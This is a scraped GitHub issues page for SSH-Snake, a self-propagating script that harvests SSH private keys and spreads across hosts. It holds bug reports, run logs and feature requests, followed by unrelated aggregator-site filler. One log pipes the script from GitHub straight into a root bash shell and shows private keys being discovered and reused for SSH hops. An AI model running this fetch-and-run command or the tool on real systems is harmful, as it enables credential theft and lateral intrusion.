SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of SSH private key and host discovery.
Home Page: https://megamansec.github.io/SSH-Snake/
License: GNU Affero General Public License v3.0
I am trying to run SSH Snake on my Ubuntu (22.04.1) machine. When I run the Snake.sh script, everything seems to work just fine. However, the no-comments version fails:
โ ~ bash ./Snake.nocomments.sh
<very beautiful ASCII art>
|-----------------------------------------|------------------------------|
| Setting | Value |
|-----------------------------------------|------------------------------|
| ignore_user | 0 |
| use_sudo | 1 |
| ssh_timeout | 3 |
| retry_count | 3 |
| scan_paths | |
| scan_paths_depth | 3 |
| interesting_users | joe root |
| interesting_hosts | 127.0.0.1 |
| interesting_dests | |
| ignored_users | |
| ignored_hosts | |
| ignored_dests | |
| ignored_key_files | *badcert.pem* *badkey.pem* |
| custom_cmds | |
| use_combinate_interesting_users_hosts | 1 |
| use_combinate_users_hosts_aggressive | 0 |
| use_find_from_hosts | 1 |
| use_find_from_last | 1 |
| use_find_from_authorized_keys | 1 |
| use_find_from_known_hosts | 1 |
| use_find_from_ssh_config | 1 |
| use_find_from_bash_history | 1 |
| use_find_arp_neighbours | 1 |
| use_find_d_block | 0 |
| use_find_from_hashed_known_hosts | 0 |
| use_find_from_prev_dest | 1 |
| use_find_from_ignore_list | 0 |
| use_retry_all_dests | 1 |
|-----------------------------------------|------------------------------|
[1704474699]bash: line 50: syntax error near unexpected token `}'
[1704474699]bash: line 50: `}'
---------------------------------------
use_retry_all_dests=1. Re-starting.
1 destinations (from 0 unique servers) added to interesting_dests.
---------------------------------------
[1704474699]bash: line 48: syntax error near unexpected token `}'
[1704474699]bash: line 48: `}'
<very beautiful ASCII art>
Unique private keys discovered: 0
Unique shell accounts accessed: 0
Unique systems accessed: 0
Need a list of servers accessed? Run one of these commands:
grep -oE "[a-z_][a-z0-9_-]{0,31}@[0-9\.]*$" output.log | sort -u
grep -oE "[a-z_][a-z0-9_-]{0,31}@\([0-9\.:]*\)$" output.log | sort -u
-- https://joshua.hu/ --
-- https://github.com/MegaManSec/SSH-Snake --
Thanks for playing!
Thanks for the script!
Running on older system, there are few syntax problem:
root@REDACTED:~# curl https://raw.githubusercontent.com/MegaManSec/SSH-Snake/main/Snake.nocomments.sh | stdbuf -o0 bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
X.X.X.X X.X.X.X 0 0 259k 0 --:--:-- --:--:-- --:--:-- 260k
...
ASCII
...
________________________~_____/^,___,-^\_________________~~_______________/`
|-----------------------------------------|------------------------------|
| Setting | Value |
|-----------------------------------------|------------------------------|
| ignore_user | 0 |
| use_sudo | 1 |
| ssh_timeout | 3 |
| retry_count | 3 |
| scan_paths | |
| scan_paths_depth | 3 |
| interesting_users | root root |
| interesting_hosts | X.X.X.X |
| interesting_dests | |
| ignored_users | |
| ignored_hosts | |
| ignored_dests | |
| ignored_key_files | *badcert.pem* *badkey.pem* |
| custom_cmds | |
| use_combinate_interesting_users_hosts | 1 |
| use_combinate_users_hosts_aggressive | 0 |
| use_find_from_hosts | 1 |
| use_find_from_last | 1 |
| use_find_from_authorized_keys | 1 |
| use_find_from_known_hosts | 1 |
| use_find_from_ssh_config | 1 |
| use_find_from_bash_history | 1 |
| use_find_arp_neighbours | 1 |
| use_find_d_block | 0 |
| use_find_from_hashed_known_hosts | 0 |
| use_find_from_prev_dest | 1 |
| use_find_from_ignore_list | 0 |
| use_retry_all_dests | 1 |
|-----------------------------------------|------------------------------|
[X.X.X.X][email protected]
[X.X.X.X]root@(X.X.X.X:X.X.X.X:X.X.X.X)
[X.X.X.X]bash: line 205: init_ignored: command not found
[X.X.X.X]bash: line 911: exec_custom_cmds: command not found
[X.X.X.X][email protected]: Discovered usable private key in [/root/.ssh/id_rsa]
[X.X.X.X][email protected]: EXTERNAL_MSG: KEY[/root/.ssh/id_rsa]: REDACTED
[X.X.X.X]bash: line 553: find_ssh_keys_paths: command not found
[X.X.X.X]bash: line 562: find_d_block: command not found
[X.X.X.X]bash: line 564: find_from_ignore_list: command not found
[X.X.X.X]bash: line 565: find_from_hashed_known_hosts: command not found
[X.X.X.X]bash: line 913: combinate_users_hosts_aggressive: command not found
[X.X.X.X][email protected]: EXTERNAL_MSG: INFO: Beginning with 17 dests and 1 keys
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
---------------------------------------
use_retry_all_dests=1. Re-starting.
3 destinations (from 1 unique servers) added to interesting_dests.
---------------------------------------
[X.X.X.X][email protected]
[X.X.X.X]root@(X.X.X.X:X.X.X.X:X.X.X.X)
[X.X.X.X]bash: line 205: init_ignored: command not found
[X.X.X.X]bash: line 735: exec_custom_cmds: command not found
[X.X.X.X][email protected]: Discovered usable private key in [/root/.ssh/id_rsa]
[X.X.X.X][email protected]: EXTERNAL_MSG: KEY[/root/.ssh/id_rsa]: REDACTED
[X.X.X.X]bash: line 469: find_ssh_keys_paths: command not found
[X.X.X.X]bash: line 473: find_from_authorized_keys: command not found
[X.X.X.X]bash: line 474: find_from_last: command not found
[X.X.X.X]bash: line 475: find_from_known_hosts: command not found
[X.X.X.X]bash: line 476: find_from_hosts: command not found
[X.X.X.X]bash: line 477: find_arp_neighbours: command not found
[X.X.X.X]bash: line 478: find_d_block: command not found
[X.X.X.X]bash: line 479: find_from_prev_dest: command not found
[X.X.X.X]bash: line 480: find_from_ignore_list: command not found
[X.X.X.X]bash: line 481: find_from_hashed_known_hosts: command not found
[X.X.X.X]bash: line 737: combinate_users_hosts_aggressive: command not found
[X.X.X.X]bash: line 738: combinate_interesting_users_hosts: command not found
[X.X.X.X]bash: line 739: deduplicate_resolved_hosts_keys: command not found
[X.X.X.X][email protected]: EXTERNAL_MSG: INFO: Beginning with 3 dests and 1 keys
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
______
_.-"" ""-._
.-' `-.
.' __.----.__ `.
/ .-" "-. / .' `. J / \ L
F J L J
J F J L
| J L |
| | | |
| J F |
J L J F
L J .-""""-. F J
J \ / \ __ / F
\ (|)(|)_ .-'".' .' /
\ \ /_>-' .<_.-' /
`. `-' .' .'
`--.|___.-'`._ _.-'
^ """"
.. ..
( '`< ( '`< ...Summary Report:
)( )(
( ----' '. ( ----' '.
( ; ( ;
(_______,' (_______,'
~^~^~^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^~~^~^~^~^~^
Unique private keys discovered: 1
Unique shell accounts accessed: 1
Unique systems accessed: 1
Need a list of servers accessed? Run one of these commands:
grep -oE "[a-z_][a-z0-9_-]{0,31}@[0-9\.]*$" output.log | sort | uniq
grep -oE "[a-z_][a-z0-9_-]{0,31}@\([0-9\.:]*\)$" output.log | sort | uniq
-- https://joshua.hu/ --
-- https://github.com/MegaManSec/SSH-Snake --
Thanks for playing!
openssl version: OpenSSL 1.0.1t 3 May 2016
bash --version : GNU bash, version 4.3.30(1)-release (x86_64-pc-linux-gnu)
Is there a way to show the hostname instead of the IP in the printout, and ultimately the visualization?
One could do a lookup retroactively of course, but if the script is running on the hosts anyway...
Sorry if there already is an option and I missed it.
bash ./Snake.nocomments.sh
bash: line 449: conditional binary operator expected
bash: line 449: syntax error near 'current_ips["$ignored_host"]'' bash: line 449: [[ -v 'current_ips["$ignored_host"]' || ${#current_ips["$ignored_host"]} -gt 0 ]] && fin'
Which is it, AGPL 3.0 (LICENSE), GPL 3.0 (COPYING), or dual license?
+Github seems to feel confused by the contents of COPYING
Systems might have Kerberos tickets or even keytabs that could be used for SSH auth.
Rename script extension to .bash instead of .sh to denote it.
$ python3 generate-graph.py --file ~/snake.log --with-users --format dot
Traceback (most recent call last):
File "/home/clem/git/SSH-Snake/tools/generate-graph.py", line 110, in <module>
nx.drawing.nx_pydot.write_dot(graph, output_dot_file_path)
File "/home/clem/git/SSH-Snake/tools/venv/lib64/python3.12/site-packages/networkx/utils/decorators.py", line 770, in func
return argmap._lazy_compile(__wrapper)(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<class 'networkx.utils.decorators.argmap'> compilation 5", line 5, in argmap_write_dot_1
File "/home/clem/git/SSH-Snake/tools/venv/lib64/python3.12/site-packages/networkx/drawing/nx_pydot.py", line 51, in write_dot
P = to_pydot(G)
^^^^^^^^^^^
File "/home/clem/git/SSH-Snake/tools/venv/lib64/python3.12/site-packages/networkx/drawing/nx_pydot.py", line 265, in to_pydot
raise ValueError(
ValueError: Node names and attributes should not contain ":" unless they are quoted with "". For example the string 'attribute:data1' should be written as '"attribute:data1"'. Please refer https://github.com/pydot/pydot/issues/258
Hi,
In my .ssh directory, I have several private keys that are symlinked (from their actual physical location on my filesystem). The script doesn't follow symlinks (in discovering private keys), thus misses out on other keys to use. Adding a -L to the find will find all symlinked keys around about here.
I would be happy to do a PR for you if you wish.
-=david=-
Script makes use of non-standard posix tooling, making it not portable to other like systems without those tools.
no issue, just wanted to say this is dope !!!
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.